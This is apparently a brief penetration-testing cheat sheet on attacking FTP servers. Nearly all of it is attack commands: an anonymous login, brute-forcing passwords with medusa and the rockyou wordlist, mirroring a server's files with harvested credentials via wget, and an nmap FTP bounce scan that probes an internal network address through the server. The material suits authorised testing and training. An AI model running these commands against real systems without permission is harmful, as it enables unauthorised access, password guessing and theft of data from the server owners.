Ftp anonymous#

ftp "$user@$target"

If FTP server allows anonymous log in, use the credential anonymous:anonymous

Spray and pray#

Know username

medusa -u $user -P /usr/share/wordlists/rockyou.txt -h $target -M ftp

No username

medusa -U ./username.list -P /usr/share/wordlists/rockyou.txt -h $target -M ftp

Spider and download#

wget -m --no-passive "ftp://$user:$pass@$target"

FTP bounce#

Use to scan ports of an internal machine not exposed to public network. Use the FTP server to send those traffics. Doesn’t really work unless misconfigured or old tech.

nmap -Pn -v -n -p80 -b "$user:$pass@$target" 172.17.0.2
Backward 2049 Tcp Nfs 25,465,587 Tcp SMTP Forward